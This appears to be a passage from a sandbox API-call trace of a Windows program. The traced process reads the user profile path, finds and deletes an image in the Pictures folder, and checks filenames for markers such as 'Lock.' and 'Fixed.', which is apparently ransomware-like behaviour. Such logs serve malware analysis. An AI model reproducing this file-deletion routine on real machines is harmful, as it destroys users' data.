hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34fe9c0 | out: hHeap=0x25c0000) returned 1 [0254.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0254.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0254.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0254.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.540] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0254.541] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.541] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0254.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f1fe0 [0254.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/-6 V-28Zs1i2mga0e.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-6 V-28Zs1i2mga0e.png", lpFilePart=0x8bedfc*="-6 V-28Zs1i2mga0e.png") returned 0x3c [0254.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0254.543] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-6 V-28Zs1i2mga0e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-6 v-28zs1i2mga0e.png")) returned 0x20 [0254.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-6 V-28Zs1i2mga0e.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b71c20, ftCreationTime.dwHighDateTime=0x1d4d291, ftLastAccessTime.dwLowDateTime=0x8823d4a0, ftLastAccessTime.dwHighDateTime=0x1d4cfca, ftLastWriteTime.dwLowDateTime=0x8823d4a0, ftLastWriteTime.dwHighDateTime=0x1d4cfca, nFileSizeHigh=0x0, nFileSizeLow=0xf4a4, dwReserved0=0x14ac, dwReserved1=0x4, cFileName="-6 V-28Zs1i2mga0e.png", cAlternateFileName="-6V-28~1.PNG")) returned 0xaa57a0 [0254.543] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-6 V-28Zs1i2mga0e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-6 v-28zs1i2mga0e.png")) returned 1 [0254.545] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b71c20, ftCreationTime.dwHighDateTime=0x1d4d291, ftLastAccessTime.dwLowDateTime=0x8823d4a0, ftLastAccessTime.dwHighDateTime=0x1d4cfca, ftLastWriteTime.dwLowDateTime=0x8823d4a0, ftLastWriteTime.dwHighDateTime=0x1d4cfca, nFileSizeHigh=0x0, nFileSizeLow=0xf4a4, dwReserved0=0x14ac, dwReserved1=0x4, cFileName="-6 V-28Zs1i2mga0e.png", cAlternateFileName="-6V-28~1.PNG")) returned 0 [0254.545] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0254.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.546] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0254.546] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0254.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0254.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.547] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f1fe0 [0254.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/-6 V-28Zs1i2mga0e.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-6 V-28Zs1i2mga0e.png", lpFilePart=0x8bf658*="-6 V-28Zs1i2mga0e.png") returned 0x3c [0254.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0254.549] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-6 V-28Zs1i2mga0e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-6 v-28zs1i2mga0e.png")) returned 0xffffffff [0254.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0254.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="70BY_GgaY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0BY_GgaY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BY_GgaY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y_GgaY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_GgaY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GgaY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gaY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aY1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.551] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="70BY_GgaY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0BY_GgaY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BY_GgaY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y_GgaY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_GgaY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GgaY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gaY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aY1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y1.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.552] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0254.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0254.552] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0254.554] CharUpperBuffW (in: lpsz="UserProfileDir", 